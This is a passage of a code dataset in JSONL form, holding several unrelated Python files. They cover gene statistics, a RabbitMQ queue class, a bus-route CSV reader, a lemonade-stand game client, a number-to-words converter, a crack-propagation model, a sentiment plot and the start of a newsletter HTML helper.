moyenne des proteines: \" + str(taille))\n\n\ndef pourcentageCodante(fichier, total): # 7.6 --> DONE\n data = newOrder(fichier)\n percentage = len(data) / float(total)\n return str(percentage * 100) + ' %'\n\n\ndef main():\n if sys.argv[1] == \"-h\" or sys.argv[1] == \"--help\":\n print ('Usage:')\n print ('\\t[1] python ' + sys.argv[0] + ' proteines PATH_TO_TAB_FILE PATH_TO_GENOME')\n print ('\\t[2] python ' + sys.argv[0] + ' codantePercent PATH_TO_FASTA_GENES_FILE TOTAL_NUCLEOTIDES')\n print ('\\t[3] python ' + sys.argv[0] + ' pourcentageGenes PATH_TO_FASTA_GENES')\n elif (sys.argv[1] == \"proteines\"):\n # Creation d'un fichier au format fasta avec les genes d'un genome\n print('Extraction des genes a partir d\\'un genome')\n fastaGenes = genes(sys.argv[2], sys.argv[3])\n print('Nouveau fichier: ' + fastaGenes)\n # Creation d'un fichier avec les proteines des diferents fichiers\n print('Traduction des genes a proteines')\n fastaProteines = traductionGenes(fastaGenes)\n print('Nouveau fichier: ' + fastaProteines)\n tailleMoyenne(sys.argv[2])\n elif (sys.argv[1] == 'codantePercent'):\n percentage = pourcentageCodante(sys.argv[2], sys.argv[3])\n print('Pourcentage de la region codante pour le fichier: ')\n print ('\\t' + sys.argv[2] + ' = ' + percentage)\n elif (sys.argv[1] == 'pourcentageGenes'):\n pourcentageFichier(sys.argv[2])\n else:\n print('Please, give me a valid option')\n\n\nmain()\n","sub_path":"TMEs/fonctions.py","file_name":"fonctions.py","file_ext":"py","file_size_in_byte":5970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"149001416","text":"\"\"\"\nThe rabbitpy.queue module contains two classes :py:class:`Queue` and\n:py:class:`Consumer`. The :py:class:`Queue` class is an object that is used\ncreate and work with queues on a RabbitMQ server. The :py:class:`Consumer`\ncontains a generator method, :py:meth:`next_message `\nwhich returns messages delivered by RabbitMQ. 
The :py:class:`Consumer` class\nshould not be invoked directly, but rather by the\n:py:meth:`Queue.consumer() <rabbitpy.queue.Queue.consumer>` method::\n\n    with conn.channel() as channel:\n        queue = rabbitpy.Queue(channel, 'example')\n        for message in queue.consume_messages():\n            print('Message: %r' % message)\n            message.ack()\n\n\"\"\"\nimport contextlib\nimport logging\nfrom pamqp import specification\n\nfrom rabbitpy import base\nfrom rabbitpy import utils\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass Queue(base.AMQPClass):\n    \"\"\"Create and manage RabbitMQ queues.\n\n    :param channel: The channel object to communicate on\n    :type channel: :py:class:`rabbitpy.channel.Channel`\n    :param str name: The name of the queue\n    :param exclusive: Queue can only be used by this channel and will\n                      auto-delete once the channel is closed.\n    :type exclusive: bool\n    :param durable: Indicates if the queue should survive a RabbitMQ restart\n    :type durable: bool\n    :param bool auto_delete: Automatically delete when all consumers disconnect\n    :param int max_length: Maximum queue length\n    :param int message_ttl: Time-to-live of a message in milliseconds\n    :param expires: Milliseconds until a queue is removed after becoming idle\n    :type expires: int\n    :param dead_letter_exchange: Dead letter exchange for rejected messages\n    :type dead_letter_exchange: str\n    :param dead_letter_routing_key: Routing key for dead lettered messages\n    :type dead_letter_routing_key: str\n    :param dict arguments: Custom arguments for the queue\n\n    \"\"\"\n    def __init__(self, channel, name='',\n                 durable=True, exclusive=False, auto_delete=False,\n                 max_length=None, message_ttl=None, expires=None,\n                 dead_letter_exchange=None, dead_letter_routing_key=None,\n                 arguments=None):\n        super(Queue, self).__init__(channel, name)\n\n        # Validate Arguments\n        for var, vname in [(auto_delete, 'auto_delete'), (durable, 'durable'),\n                           (exclusive, 'exclusive')]:\n            if not isinstance(var, bool):\n                raise ValueError('%s must be True or False' % vname)\n\n        for var, vname in [(max_length, 'max_length'),\n                           (message_ttl, 'message_ttl'), (expires, 'expires')]:\n            if var and not isinstance(var, int):\n                raise ValueError('%s must be an int' % vname)\n\n        for var, vname in [(dead_letter_exchange,\n                            'dead_letter_exchange'),\n                           (dead_letter_routing_key,\n                            'dead_letter_routing_key')]:\n            if var and not utils.is_string(var):\n                raise ValueError('%s must be a str, bytes or unicode' % vname)\n\n        if arguments and not isinstance(arguments, dict):\n            raise ValueError('arguments must be a dict')\n\n        # Defaults\n        self.consumer_tag = 'rabbitpy.%i.%s' % (self.channel.id, id(self))\n        self.consuming = False\n\n        # Assign Arguments\n        self._durable = durable\n        self._exclusive = exclusive\n        self._auto_delete = auto_delete\n        self._arguments = arguments or {}\n        self._max_length = max_length\n        self._message_ttl = message_ttl\n        self._expires = expires\n        self._dlx = dead_letter_exchange\n        self._dlr = dead_letter_routing_key\n\n    def __len__(self):\n        \"\"\"Return the pending number of messages in the queue by doing a passive\n        Queue declare.\n\n        :rtype: int\n\n        \"\"\"\n        response = self._rpc(self._declare(True))\n        return response.message_count\n\n    def bind(self, source, routing_key=None, arguments=None):\n        \"\"\"Bind the queue to the specified exchange or routing key.\n\n        :type source: str or :py:class:`rabbitpy.exchange.Exchange` exchange\n        :param source: The exchange to bind to\n        :param str routing_key: The routing key to use\n        :param dict arguments: Optional arguments for RabbitMQ\n        :return: bool\n\n        \"\"\"\n        if 
hasattr(source, 'name'):\n            source = source.name\n        frame = specification.Queue.Bind(queue=self.name,\n                                         exchange=source,\n                                         routing_key=routing_key or '',\n                                         arguments=arguments)\n        response = self._rpc(frame)\n        return isinstance(response, specification.Queue.BindOk)\n\n    @contextlib.contextmanager\n    def consumer(self, no_ack=False, prefetch=100, priority=None):\n        \"\"\"Consumer message context manager, returns a consumer message\n        generator.\n\n        :param bool no_ack: Do not require acknowledgements\n        :param int prefetch: Set a prefetch count for the channel\n        :param int priority: Consumer priority\n        :rtype: :py:class:`Consumer <rabbitpy.queue.Consumer>`\n\n        \"\"\"\n        if prefetch is not None:\n            self.channel.prefetch_count(prefetch)\n        self.channel._consume(self, no_ack, priority)\n        self.consuming = True\n        yield Consumer(self)\n\n    def consume_messages(self, no_ack=False, prefetch=100, priority=None):\n        \"\"\"Consume messages from the queue as a generator:\n\n        ```\n        for message in queue.consume_messages():\n            message.ack()\n        ```\n\n        :param bool no_ack: Do not require acknowledgements\n        :param int prefetch: Set a prefetch count for the channel\n        :param int priority: Consumer priority\n        :rtype: :py:class:`Iterator`\n\n        \"\"\"\n        with self.consumer(no_ack, prefetch, priority) as consumer:\n            for message in consumer.next_message():\n                yield message\n\n    def declare(self, passive=False):\n        \"\"\"Declare the queue on the RabbitMQ channel passed into the\n        constructor, returning the current message count for the queue and\n        its consumer count as a tuple.\n\n        :param bool passive: Passive declare to retrieve message count and\n                             consumer count information\n        :return: Message count, Consumer count\n        :rtype: tuple(int, int)\n\n        \"\"\"\n        response = self._rpc(self._declare(passive))\n        return response.message_count, response.consumer_count\n\n    def delete(self, if_unused=False, if_empty=False):\n        \"\"\"Delete the queue\n\n        :param bool if_unused: Delete only if unused\n        :param bool if_empty: Delete only if empty\n\n        \"\"\"\n        self._rpc(specification.Queue.Delete(queue=self.name,\n                                             if_unused=if_unused,\n                                             if_empty=if_empty))\n\n    def get(self, acknowledge=True):\n        \"\"\"Request a single message from RabbitMQ using the Basic.Get AMQP\n        command.\n\n        :param bool acknowledge: Let RabbitMQ know if you will manually\n                                 acknowledge or negatively acknowledge the\n                                 message after each get.\n        :rtype: rabbitpy.message.Message or None\n\n        \"\"\"\n        self._write_frame(specification.Basic.Get(queue=self.name,\n                                                  no_ack=not acknowledge))\n        return self.channel._get_message()\n\n    def ha_declare(self, nodes=None):\n        \"\"\"Declare the queue as highly available, passing in a list of nodes\n        the queue should live on. If no nodes are passed, the queue will be\n        declared across all nodes in the cluster.\n\n        :param list nodes: A list of nodes to declare. If left empty, queue\n                           will be declared on all cluster nodes.\n        :return: Message count, Consumer count\n        :rtype: tuple(int, int)\n\n        \"\"\"\n        if nodes:\n            self._arguments['x-ha-policy'] = 'nodes'\n            self._arguments['x-ha-nodes'] = nodes\n        else:\n            self._arguments['x-ha-policy'] = 'all'\n            if 'x-ha-nodes' in self._arguments:\n                del self._arguments['x-ha-nodes']\n        return self.declare()\n\n    def purge(self):\n        \"\"\"Purge the queue of all of its messages.\"\"\"\n        self._rpc(specification.Queue.Purge())\n\n    def unbind(self, source, routing_key=None):\n        \"\"\"Unbind queue from the specified exchange where it is bound by the\n        routing key. 
If routing key is None, use the queue name.\n\n        :type source: str or :py:class:`rabbitpy.exchange.Exchange` exchange\n        :param source: The exchange to unbind from\n        :param str routing_key: The routing key that binds them\n\n        \"\"\"\n        if hasattr(source, 'name'):\n            source = source.name\n        self._rpc(specification.Queue.Unbind(queue=self.name,\n                                             exchange=source,\n                                             routing_key=routing_key or\n                                                         self.name))\n\n    def _declare(self, passive=False):\n        \"\"\"Return a specification.Queue.Declare class pre-composed for the rpc\n        method since this can be called multiple times.\n\n        :param bool passive: Passive declare to retrieve message count and\n                             consumer count information\n        :rtype: pamqp.specification.Queue.Declare\n\n        \"\"\"\n        arguments = dict(self._arguments)\n        if self._expires:\n            arguments['x-expires'] = self._expires\n        if self._message_ttl:\n            arguments['x-message-ttl'] = self._message_ttl\n        if self._max_length:\n            arguments['x-max-length'] = self._max_length\n        if self._dlx:\n            arguments['x-dead-letter-exchange'] = self._dlx\n        if self._dlr:\n            arguments['x-dead-letter-routing-key'] = self._dlr\n        return specification.Queue.Declare(queue=self.name,\n                                           durable=self._durable,\n                                           passive=passive,\n                                           exclusive=self._exclusive,\n                                           auto_delete=self._auto_delete,\n                                           arguments=arguments)\n\n\nclass Consumer(object):\n    \"\"\"The Consumer class implements an iterator that will retrieve the next\n    message from the stack of messages RabbitMQ has delivered until the client\n    exits the iterator. It should be used with the\n    :py:meth:`Queue.consumer() <rabbitpy.queue.Queue.consumer>` method which\n    returns a context manager for consuming.\n\n    \"\"\"\n    def __init__(self, queue):\n        self.queue = queue\n\n    def __exit__(self, exc_type, exc_val, exc_tb):\n        \"\"\"Called when exiting the consumer iterator\n\n        \"\"\"\n        self.queue.channel.rpc(self._basic_cancel)\n        self.queue.consuming = False\n\n    @property\n    def _basic_cancel(self):\n        return specification.Basic.Cancel(consumer_tag=self.queue.consumer_tag)\n\n    def next_message(self):\n        \"\"\"Retrieve the next message from the queue as an iterator, blocking\n        until the next message is available.\n\n        :rtype: :py:class:`rabbitpy.message.Message`\n\n        \"\"\"\n        while self.queue.consuming:\n            yield self.queue.channel._consume_message()\n","sub_path":"rabbitpy/amqp_queue.py","file_name":"amqp_queue.py","file_ext":"py","file_size_in_byte":11557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"111662191","text":"import os, re\n\n__author__ = 'jonathan'\n\ndef get_ignore_list(file_name):\n    data = []\n    with open(file_name, 'r') as reader:\n        for line in reader:\n            row = [item.strip() for item in line.strip().split(',')]\n            data.append(row)\n\n    return data\n\ndef clear_beginning_zero(string):\n    return re.sub('^[0]+', '', string)\n\ndef retrieve_data_from_csv(file_names, bus_service_id, ignore_list):\n    data = []\n    for file_name in file_names:\n        with open(file_name, 'r') as reader:\n            for line in reader:\n                row = [item.strip() for item in line.strip().split(',')]\n                #bus service id process\n                row[0] = clear_beginning_zero(row[0])\n                if bus_service_id.endswith('all'):\n                    if [row[0], row[1]] not in ignore_list:\n                        data.append(row)\n                elif row[0] == bus_service_id:\n                    data.append(row)\n    return data\n\ndef export_sql(sql, bus_service_id, sql_export_path):\n    sql_file_name = '%s/%s.sql' % (sql_export_path, bus_service_id)\n    dir = os.path.dirname(sql_file_name)\n    if not os.path.exists(dir):\n        os.makedirs(dir)\n    fw = open(sql_file_name, 'w')\n    fw.write(sql)\n    fw.close()\n    print('%s has been 
generated.' % sql_file_name)\n\ndef main():\n print(retrieve_data_from_csv('//192.168.152.135/share/PTP2/_SERVICE REQUESTS/VT293-SR-PTP-20121218-0134/file from user/CSV File/SBST Route (16Dec12).CSV', '50'))\n\nif __name__ == '__main__':\n main()","sub_path":"bus_update/common/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"441629170","text":"import requests\nimport json\n\n# Basic variables, shouldn't change much\nisDebug = False\n\nsignCost = 15\nlemonadeCost = 2\nassets = 200\n\nbaseurl = \"http://localhost:51727/Game/\" # CHANGE WHEN DEPLOYED\nheaders = {'Content-Type': 'application/json'}\n\ndayInfo = {}\nresults = {}\n\n# DEBUG PRINTS\n# if isSending is True, will say that it is data to be sent.\ndef printData(data,isSending=False):\n\tglobal isDebug\n\tif not isDebug:\n\t\treturn\n\n\tprint(\"\")\n\tprint(\"--------\")\n\tprint(\"\")\n\n\tif isSending:\n\t\tmsg = \"HTTP: Data to be sent: {0}\"\n\telse:\n\t\tmsg = \"HTTP: Data received: {0}\"\n\t\t\n\tprint(msg.format(data))\n# } end printData\n\n\n\n# Not called by outside program: Validates that a set of choices is correct.\ndef validateChoices(choices):\n\tglobal assets, lemonadeCost, signCost, baseurl, headers\n\tif int(choices[0]['Price']) > 100:\n\t\treturn \"Lemonade for more than a dollar? That's highway robbery.\"\n\n\tif int(choices[0]['Price']) < 0:\n\t\treturn \"You can't give away money with the lemonade!\"\n\n\tglasses = int(choices[0]['Glasses'])\n\tsigns = int(choices[0]['Signs'])\n\n\tif glasses < 0 or signs < 0:\n\t\treturn \"You can't make negative amounts of signs or glasses in the real world.\"\n\n\tif glasses * lemonadeCost + signs * signCost > assets:\n\t\tpossibleGlasses = (assets - signs * signCost) // lemonadeCost\n\t\tif possibleGlasses <= 0:\n\t\t\treturn \"You don't have enough money for that, you've got too many signs.\"\n\t\telse:\n\t\t\treturn f\"You don't have enough money for that. 
Maybe try {possibleGlasses} glasses of lemonade and {signs} signs?\"\n\n\treturn \"G\"\n\n\n# Tell the amount of money available.\ndef printAssets():\n\tglobal assets\n\treturn f\"You have {assets}¢ available.\"\n\n\n\n\n# DAY START ===================================\ndef startNextDay(gameId):\n\tglobal baseurl, headers, dayInfo\n\t# get next day information\n\turl = baseurl + \"NextDay\"\n\tdata = {}\n\tdata['Id'] = gameId\n\tdata = json.dumps(data);\n\n\tr = requests.post(url, headers=headers, data=data)\n\n\tdayInfo = {\n\t\t'DayNumber': r.json()['Number'],\n\t\t'Weather': r.json()['Weather']['Name'],\n\t\t'Event': r.json()['ForecastMessage'],\n\t\t'LemonadeCost': r.json()['LemonadeCost']\n\t}\n\ndef printDayOverview():\n\treturn printDayNumber() + \"\\n\" + printCostToMake() + \"\\n\" + printWeather() + \"\\n\" + printEvent()\n\ndef printWeather():\n\treturn f\"The weather today is {dayInfo['Weather']}.\"\n\ndef printEvent():\n\tif dayInfo['Event'] == \"\":\n\t\treturn \"Today will be a normal day.\"\n\telse:\n\t\treturn dayInfo['Event']\n\ndef printCostToMake():\n\tglobal lemonadeCost\n\treturn f\"It costs {lemonadeCost}¢ to make one cup of lemonade.\"\n\ndef printCostSign():\n\tglobal signCost\n\treturn f\"It costs {signCost}¢ to make one advertising sign.\"\n\ndef printDayNumber():\n\treturn f\"It is day {dayInfo['DayNumber']}.\"\n\n\n# DAY END ================================\ndef finishDay(choices, gameId):\n\tglobal assets, lemonadeCost, signCost, baseurl, headers, results\n\t# send post request to finish day\n\tdata = {}\n\tdata['Choices'] = choices\n\tdata['Id'] = gameId\n\tdata = json.dumps(data)\n\n\turl = baseurl + \"FinishDay\"\n\tr = requests.post(url, headers=headers, data=data)\n\n\tresults = {\n\t\t'ResultMessage': r.json()['ResultMessage'],\n\t\t'EventName': r.json()['EventName'],\n\t\t'GlassesSold': r.json()['Results'][0]['GlassesSold'],\t\t# return json is an array of result objects\n\t\t'Revenue': r.json()['Results'][0]['Revenue'],\t\t\t\t# because of 'multiple players in one game'\n\t\t'Expenses': r.json()['Results'][0]['Expenses'],\t\t\t\t# that would have different results\n\t\t'Profits': r.json()['Results'][0]['Profits']\t\t\t\t# since one player, we always need results[0]\n\t}\n\ndef printResultsOverview():\n\t# Don't display message and event if they're boring\n\tif printResultsMessage() == \"A normal, uneventful day.\":\n\t\tmsg1 = \"\"\n\telse:\n\t\tmsg1 = printResultsMessage() + \"\\n\"\n\n\tif printResultsEvent() == \"A normal, uneventful day.\":\n\t\tmsg2 = \"\"\n\telse:\n\t\tmsg2 = printResultsEvent() + \"\\n\"\n\n\treturn msg1 + msg2 + printResultsSold() + \"\\n\" + printResultsMoney()\n\n# ResultsMessage is only used if the street workers buy all your lemonade\n#\tor a storm wipes away everything for the day.\ndef printResultsMessage():\n\tif results['ResultMessage'] == \"\":\n\t\treturn \"A normal, uneventful day.\"\n\treturn results['ResultMessage']\n\n# A simple name for the day's event, like Storm or Street Work or Normal Day.\ndef printResultsEvent():\n\tif results['EventName'] == \"Normal day\":\n\t\treturn \"A normal, uneventful day.\"\n\treturn f\"The {results['EventName']} was happening all day.\"\n\ndef printResultsSold():\n\treturn f\"You sold {results['GlassesSold']} glasses of lemonade.\"\n\ndef printResultsMoney():\n\treturn f\"We spent {results['Expenses']}¢ today and brought in {results['Revenue']}¢ for a total profit of {results['Profits']}¢.\"\n\n\ndef printGreeting():\n\treturn \"Hello there, I'm the lemonade game bot. 
Tell me to start a game to begin playing!\"\n\ndef printRules():\n\treturn (\"You are going to start up a lemonade stand with some help from your friends.\\n\"\n\t\t\t\t\"You'll begin with $2.00 and will determine how many glasses of lemonade to make\"\n\t\t\t\t\" per day, how much to charge per glass, and how many advertising signs to make.\\n\"\n\t\t\t\t\"Signs cost 15¢ to make, but attract more customers. \"\n\t\t\t\t\"You have some sugar given to you to start, so lemonade will be cheaper to make the\"\n\t\t\t\t\" first few days.\\n\"\n\t\t\t\t\"To play, just talk with me like you would with a friend. Ask me 'how's the weather', for example.\\n\"\n\t\t\t\t\"Happy selling!\")\n\t\ndef createGame(name = \"Python\"):\n\tglobal assets, lemonadeCost, signCost, baseurl, headers\n\n\t# Create the game\n\turl=baseurl + \"CreateGame\"\n\n\t#Setup player name\n\tdata = {}\n\tdata['PlayerNames'] = [name]\n\tdata = json.dumps(data)\n\n\tprintData(data, True)\n\n\t#send request to the game server\n\tr = requests.post(url, headers=headers, data=data)\n\tprintData(r.json())\n\n\tgameId = r.json()['Id']\n\n\tstartNextDay(gameId)\n\tlemonadeCost = dayInfo['LemonadeCost']\n\n\treturn gameId\n\n\ndef doFinishDay(glasses, price, signs, gameId):\n\tglobal results, assets, lemonadeCost\n\tchoices = [{\"Glasses\": glasses, \"Price\": price, \"Signs\": signs}]\n\n\t# Validate what was just input\n\tmsg = validateChoices(choices)\n\tif msg != \"G\":\n\t\treturn msg\n\n\t# actually do the result check\n\tfinishDay(choices, gameId)\n\tassets += results[\"Profits\"]\n\n\t# bankruptcy check\n\tif assets < lemonadeCost:\n\t\treturn \"You're bankrupt!\"\n\n\tstartNextDay(gameId)\n\tlemonadeCost = dayInfo['LemonadeCost']\n\n\treturn \"\"\n\n\nactions = {\n\t\"Assets\": printAssets,\n\t\"DayOverview\": printDayOverview,\n\t\"DayNumber\":printDayNumber,\n\t\"Weather\": printWeather,\n\t\"Event\":printEvent,\n\t\"CostPerGlass\":printCostToMake,\n\t\"CostPerSign\":printCostSign,\n\t\"ResultsMessage\":printResultsMessage,\n\t\"ResultsOverview\":printResultsOverview,\n\t\"ResultsEvent\":printResultsEvent,\n\t\"ResultsSold\":printResultsSold,\n\t\"ResultsMoney\": printResultsMoney,\n\t\"Greeting\":printGreeting,\n\t\"Rules\":printRules\n}\n\ndef doGetAction(action):\n\treturn actions[action]()\n\n","sub_path":"pythonConnector/playLemonade.py","file_name":"playLemonade.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"265948036","text":"# Name: Number Namer\n# Author: Devin Vander Stelt\n# Description: Name any large number, negative or positive\n# Usage: name(-105)\n\n# Dictionary for the ones place\nones = {\n    0: \"\",\n    1: \"one\",\n    2: \"two\",\n    3: \"three\",\n    4: \"four\",\n    5: \"five\",\n    6: \"six\",\n    7: \"seven\",\n    8: \"eight\", \n    9: \"nine\"\n}\n\n# Dictionary for the teens, because English\nteens = {\n    0: \"ten\",\n    1: \"eleven\",\n    2: \"twelve\",\n    3: \"thirteen\",\n    4: \"fourteen\",\n    5: \"fifteen\",\n    6: \"sixteen\",\n    7: \"seventeen\",\n    8: \"eighteen\",\n    9: \"nineteen\"\n}\n\n# Dictionary for multiples of ten\ntens = {\n    0: \"\", # There is no tens place\n    1: \"\", # This is handled by the teens place\n    2: \"twenty\",\n    3: \"thirty\",\n    4: \"forty\", \n    5: \"fifty\",\n    6: \"sixty\",\n    7: \"seventy\",\n    8: \"eighty\",\n    9: \"ninety\"\n}\n\n# Array for suffixes, such as thousand, million, etc\nsuffixes = [\n    \"\",# For the first three digits there is no suffix\n    \" thousand \",\n    \" 
million \",\n \" billion \",\n \" trillion \",\n \" quadrillion \",\n \" quintillion \",\n \" sextillion \",\n \" septillion \",\n \" octillion \",\n \" nonillion \",\n \" decillion \",\n \" undecillion \",\n \" duodecillion \",\n \" tredecillion \",\n \" quatturodecillion \",\n \" quindecillion \",\n \" sexdecillion \",\n \" septdecillion \",\n \" octodecillion \",\n \" nondecillion \",\n \" vigintillion \",\n \" unvigintillion \",\n \" duovigintillion \",\n \" trevigintillion \",\n \" quattuorvigintillion \",\n \" quinvigintillion \",\n \" sexvigintillion \",\n \" septenvigintillion \"\n # After this, do you even care any more?\n]\n\n\ndef name_three(nums): # nums is a list of three numbers\n hundreds = \"\"\n tens_ones = \"\"\n\n if nums[0] != 0: # If the hundreds place is not 0\n hundreds = ones[nums[0]] + \" hundred \"\n \n if nums[1] != 1: # If our number is not in the teens\n tens_ones = tens[nums[1]] + (\" \" + ones[nums[2]] if nums[2] != 0 else \"\") # Ternary operator, look it up\n else:\n tens_ones = teens[nums[2]]\n\n return hundreds + tens_ones\n\n\ndef name(num):\n digits = []\n negative = False\n\n if num < 0: # If num is negative\n negative = True # Set negative variable to true\n num = abs(num) # Make num positive\n\n # Convert the number to an array of digits\n for _ in range(len(str(num))): # For every digit in num\n digit = num % 10 # Get the place of the first digit\n digits.insert(0, digit) # Add to the digits array\n num = num // 10 # Remove the digit from num\n\n output = \"\"\n\n # Append extra zeros to the beginning to make a group of three\n zeros_needed = 3- (len(digits) % 3)\n for _ in range(zeros_needed):\n digits.insert(0, 0)\n\n for i in range(len(digits) // 3): # For every complete group of three\n end = len(digits) - 3*i # Get the end of the group\n start = end - 3 # Get the start of the group\n three_group = digits[start: end] # Create list with the group of three\n group_name = name_three(three_group) # Get the name of the group of three\n output = (\n group_name\n + (suffixes[i] if group_name.replace(\" \", \"\") != \"\" else \"\") # Add appropriate suffix if name isn't blank, using i as index\n + output # Add previous output to end, since we are moving right to left\n )\n\n if negative:\n output = \"negative \" + output\n\n if output.replace(\" \", \"\") == \"\": # If our output string is just a bunch of spaces\n output = \"zero\" # Our number is zero\n\n return output\n\n\nprint(name(-113))","sub_path":"Number_Name/name.py","file_name":"name.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"297406693","text":"import numpy as np\nimport random\nimport math\n\nclass Marker:\n def __init__(self, startLocation, direction):\n self.currLocation = np.array(startLocation)\n self.prevLocation = np.array(startLocation)\n self.direction = np.array(direction)\n self.moveSpeed = .095\n self.finished = False\n self.normal = np.array([0.,1.,0.])\n \n def propagate(self, lowToughnessAreas, initCrack):\n rng = 0 if initCrack else random.uniform(.15, 1.)\n \n rng *= self.calcMovementWeight(lowToughnessAreas)\n \n self.prevLocation = np.copy(self.currLocation)\n \n # Ensure energy conservation\n forwardSpeed = self.moveSpeed * self.direction * (1. 
- abs(rng))\n normalSpeed = rng * self.moveSpeed * self.normal\n \n self.currLocation += forwardSpeed + normalSpeed\n \n def calcMovementWeight(self, lowToughnessAreas):\n deltaY = 1000.\n lowestToughnessArea = 0.\n maxWeight = .67\n maxThreshold = 3.1\n \n for y in lowToughnessAreas:\n if abs(self.currLocation[1] - y) < deltaY:\n lowestToughnessArea = y\n deltaY = abs(self.currLocation[1] - y)\n \n # Ideally we should set the max threshold to be the point of highest toughness between the marker and either\n # the edge of the surface mesh, or the next low toughness area\n maxThreshold = lowestToughnessArea\n \n constant = maxThreshold / (maxThreshold + .35)\n \n # Determined this equation through trial and error\n scalarVal = pow(math.exp(.357 * pow(((constant * deltaY) - maxThreshold), 3.)), math.pi / 10.) + .004\n \n # Clamp value\n scalarVal = min(scalarVal, 1.)\n scalarVal = max(scalarVal, 0.)\n \n weight = maxWeight * scalarVal\n \n if lowestToughnessArea < self.currLocation[1]:\n weight = -weight\n \n return weight\n ","sub_path":"marker.py","file_name":"marker.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"652377610","text":"#------------------------------------------------------------------\n#Import the packages\n#------------------------------------------------------------------\n\nfrom __future__ import division\nimport matplotlib.pyplot as plt\nfrom pylab import *\nimport numpy as np\nfrom datetime import datetime\n\n#------------------------------------------------------------------\n# Compute the statistics\n#------------------------------------------------------------------\n\nstart = 1439892000 #08/18 6:00\nend = 1439935200 #08/18 18:00\nendpoints = np.linspace(start, end, 13)\n\nclass chunk_file:\n \n def __init__(self, name):\n self.name = name \n self.file = []\n self.chunk_file = []\n self.read_file()\n self.chunkit()\n \n def read_file(self): \n f = open('_'.join(self.name.split(' '))+'.txt','rb')\n sent = f.read().split('\\n')\n f.close()\n self.file = [w.strip().split(' ') for w in sent]\n return\n \n def chunkit(self):\n for i in range(12):\n t = endpoints[i]\n t2 = t + 3600\n res = [(w[1]=='pos',w[1]=='neg') \n for w in self.file \n if t < float(w[0].strip()) <= t2]\n pos, neg = sum([w[0] for w in res]), sum([w[1] for w in res])\n self.chunk_file.append([pos,\n neg,\n datetime.fromtimestamp(int(t2)).strftime('%m-%d %H:%M')])\n return\n \n def summary(self):\n positive = [w[0] for w in self.chunk_file]\n total = [(w[0]+w[1]) for w in self.chunk_file]\n t = [w[2] for w in self.chunk_file]\n cum_prob = []\n for i in range(1,13):\n cum_prob.append(sum(positive[:i])/sum(total[:i]))\n return cum_prob, t, positive, total\n \n \ncum1, t, pos1,total1 = chunk_file('Hillary Clinton').summary()\ncum2, t, pos2, total2 = chunk_file('Donald Trump').summary()\n \n#------------------------------------------------------------------\n# Plot the cumulative sentiment ratio\n#------------------------------------------------------------------\n\nfig = plt.figure()\nax = fig.add_subplot(111)\n\np = arange(12)+.5 \n\np1 = ax.plot(p,cum1)\nsetp(p1, \n marker ='s', \n markersize = 10,\n markeredgecolor = 'none', \n linewidth = 5, \n color = '#0B0B61',\n label = 'Clinton') \nfor i,j in zip(p,cum1):\n ax.annotate(round(j,2),xy=(i-0.3,j+0.007),fontweight = 'bold')\n\np2 = plot(p,cum2)\nsetp(p2, \n marker = 'o',\n markersize = 12,\n markeredgecolor = 'none',\n linewidth = 5, \n color = 'r',\n 
label = 'Trump')\nfor i,j in zip(p,cum2):\n    ax.annotate(round(j,2),xy=(i-0.3,j+0.007),fontweight = 'bold')\n\nxticks(p, ['\\n'.join(i.split(' ')) for i in t],fontsize=11)\nlegend(bbox_to_anchor=(1.05, 0.5), loc=2, borderaxespad=0.5,frameon=False,labelspacing =2)\nax.set_xlabel('Time',fontsize=14)\nax.set_ylabel('Positive Rate', fontsize=14)\ntitle('Cumulative Sentiment Scores\\n',fontsize=20)\ngrid(True,linestyle='-', linewidth=1) \n\nshow()\n\n","sub_path":"nlp_tutorial2_plot.py","file_name":"nlp_tutorial2_plot.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"363958274","text":"#encoding: utf-8\nfrom OpenOrange import *\nfrom Mail import Mail\nimport string\nimport re\n\nNewsletterSelectionType = {\"Customers\":0, \"Labels\":1, \"CustGroup\":2, \"Contacts\":3}\n\nParentNewsletter = SuperClass(\"Newsletter\",\"Numerable\",__file__)\n# Shouldn't this derive from Mailing instead??\nclass Newsletter(ParentNewsletter):\n    \n    def defaults(self):\n        ParentNewsletter.defaults(self)\n        #self.PacketSize = 10\n        self.User = currentUser()\n        self.pasteUser()\n    \n    def pasteUser(self):\n        from User import User\n        user = User()\n        user.Code = self.User\n        self.FromMail = \"\"\n        if user.load():\n            from Person import Person\n            person = Person()\n            person.Code = user.Person\n            if person.load(): self.MailFrom = person.Email\n\n    def pasteMailCode(self):\n        from MailAccount import MailAccount\n        acc = MailAccount()\n        acc.Code = self.MailCode\n        if (acc.load()):\n            self.MailFrom = acc.Mail\n\n    def getIMGTags(self, html):\n        tags = []\n        regexp = re.compile(\"(<img[^>]*>)\")  # capture complete <img ...> tags\n        pos = 0\n        while True:\n            search = regexp.search(html,pos)\n            if search:\n                pos = search.end(1) + 1\n                for g in search.groups():\n                    tags.append(g)\n            else:\n                break\n        return tags\n\n    def getFilenameFromIMG(self, tag):\n        fn = \"\"\n        regexp = re.compile(\"src=([^\\\" >]+)\")\n        search = regexp.search(tag)\n        if search: \n            fn = search.group(1)\n        else:\n            regexp = re.compile(\"src=\\\"([^\\\">]+)\\\"\")\n            search = regexp.search(tag)\n            if search:  # skip when neither pattern matched\n                fn = search.group(1)\n        originalfn = fn\n        if fn.startswith(\"file:///\"): fn = fn[8:]\n        fn = fn.replace('|', ':').replace(\"%20\",' ')\n        return fn, originalfn\n\n    def importHTML(self, html):\n        tags = self.getIMGTags(html)\n        newhtml = html\n        for tag in tags:\n            imgfn, originalimgfn = self.getFilenameFromIMG(tag)\n            \n            if imgfn != \"\":\n                try:\n                    img = file(imgfn, \"rb\")\n                    attachid = 